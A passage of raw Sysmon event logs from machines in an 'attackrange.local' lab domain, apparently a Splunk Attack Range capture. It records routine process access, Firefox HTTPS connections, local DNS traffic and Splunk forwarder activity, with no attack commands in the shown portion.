Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA69BA87B2E62D179E76419BD9BA0EA2,SHA256=040DF1A3B7EF90556EA3FCEB306F28F7D8C1A7E5F82E0C0DE127B9A26CF13301,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918350Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:48.747{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918349Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:48.747{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918348Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.836{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1048-false52.84.162.36server-52-84-162-36.sea19.r.cloudfront.net443https 354300x80000000000000005918347Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.494{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1047-false72.21.91.24-443https 354300x80000000000000005918346Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.197{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1046-false34.202.225.38ec2-34-202-225-38.compute-1.amazonaws.com443https 354300x80000000000000005918345Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.009{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1042-false104.244.42.133-443https 354300x80000000000000005918344Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.007{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1045-false151.139.237.219-443https 354300x80000000000000005918343Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.003{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1044-false72.21.91.24-443https 354300x80000000000000005918342Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.982{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1043-false216.58.217.36sea15s08-in-f4.1e100.net443https 354300x80000000000000005918341Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.944{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1039-false216.58.193.67sea15s07-in-f3.1e100.net443https 354300x80000000000000005918340Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.944{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1040-false216.58.193.67sea15s07-in-f3.1e100.net443https 354300x80000000000000005918339Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.943{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1038-false216.58.193.67sea15s07-in-f3.1e100.net443https 354300x80000000000000005918338Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.943{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1041-false216.58.193.67sea15s07-in-f3.1e100.net443https 354300x80000000000000005918337Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.797{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1035-false99.86.38.54server-99-86-38-54.sea19.r.cloudfront.net443https 354300x80000000000000005918336Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.796{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1036-false99.86.38.54server-99-86-38-54.sea19.r.cloudfront.net443https 354300x80000000000000005918335Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.796{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1034activesyncfalse99.86.38.54server-99-86-38-54.sea19.r.cloudfront.net443https 354300x80000000000000005918334Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.796{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1037-false99.86.38.54server-99-86-38-54.sea19.r.cloudfront.net443https 354300x80000000000000005918333Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.796{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1033-false99.86.38.54server-99-86-38-54.sea19.r.cloudfront.net443https 23542300x80000000000000005918332Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:48.153{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=329A3B0046656BBB50F77E8DD6F705AF,SHA256=57FE38C9FED9635E81C0F9EBED0753669E2CC076DB1FFCDD6725130003476BE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918370Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.908{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E94071EE8CFB9E3B421040E7CC720C2C,SHA256=9F57A423BB158E7252B4E2395D3742F91D898520F4935EA4497612C668620C57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638658Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:49.381{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E79306262EFFB625703F79C88E9FA2F1,SHA256=6EB8A08B3D20D3F69650C33E22809188A32A2E96BC978F18B41DF71A44C35D71,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918369Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.747{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918368Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.747{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918367Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.901{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51036- 354300x80000000000000005918366Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.875{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local51036- 10341000x80000000000000005918365Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.379{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B439-605B-9369-00000000AE01}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918364Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.378{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918363Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.378{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918362Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.377{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918361Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.377{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918360Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.377{896A638B-B5C8-6058-0500-00000000AE01}396356C:\Windows\system32\csrss.exe{896A638B-B439-605B-9369-00000000AE01}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918359Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.377{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B439-605B-9369-00000000AE01}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918358Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.242{896A638B-B439-605B-9369-00000000AE01}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005918357Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.339{896A638B-C9AE-6058-4C07-00000000AE01}34207628C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cc30|C:\Program Files\Mozilla Firefox\firefox.exe+2c783|C:\Program Files\Mozilla Firefox\firefox.exe+40ae0|C:\Program Files\Mozilla Firefox\firefox.exe+407dc|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918356Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.338{896A638B-C9AE-6058-4C07-00000000AE01}34207628C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cc30|C:\Program Files\Mozilla Firefox\firefox.exe+2c783|C:\Program Files\Mozilla Firefox\firefox.exe+40ae0|C:\Program Files\Mozilla Firefox\firefox.exe+407dc|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918355Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.310{896A638B-C9AE-6058-4C07-00000000AE01}34207628C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cc30|C:\Program Files\Mozilla Firefox\firefox.exe+2c783|C:\Program Files\Mozilla Firefox\firefox.exe+40ae0|C:\Program Files\Mozilla Firefox\firefox.exe+407dc|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918354Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.310{896A638B-C9AE-6058-4C07-00000000AE01}34207628C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cc30|C:\Program Files\Mozilla Firefox\firefox.exe+2c783|C:\Program Files\Mozilla Firefox\firefox.exe+40ae0|C:\Program Files\Mozilla Firefox\firefox.exe+407dc|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918353Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.309{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-5007-00000000AE01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+119d033|C:\Program Files\Mozilla Firefox\xul.dll+112db55|C:\Program Files\Mozilla Firefox\xul.dll+1124328|C:\Program Files\Mozilla Firefox\xul.dll+112472d|C:\Program Files\Mozilla Firefox\xul.dll+1271764|C:\Program Files\Mozilla Firefox\xul.dll+1091d8f|C:\Program Files\Mozilla Firefox\xul.dll+c5a166|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 23542300x80000000000000005918352Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:49.211{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=213C0C5A0C3017A52CFBF71D6F5B8BDF,SHA256=FE3436B45036B1B12715DF276222401FE10F40744EE7594C11203EB34895F8E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638657Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:49.256{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A36E76B9D0C4F2B9BF284A184CD5140,SHA256=C1ECE5F8BDFE2A9E9B388113CA71CB6D03BA16B414787A95BE9AEF1EC8842668,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638656Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:49.256{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0519CE6C4EF920C067F1CF0722FCE99F,SHA256=F980A1028CDBC0C8EECE07CCE2DB6FC0A56B8D9302743612616387F0206869F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918392Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.917{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E1EAF68023E790A79AEC050EEB56571,SHA256=08FF3B49FA528A70D036D249031FA410B7A1A2724A73BAF135FFD66A9F2C715C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638660Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:50.397{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39D7C80632BD34E088269ED27F7739B0,SHA256=5255411C054EE4EF3A2ADB632F91CCCCE101F1ED35AC2662B694EDE55DB9156A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918391Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:50.825{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B43A-605B-9569-00000000AE01}7272C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918390Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 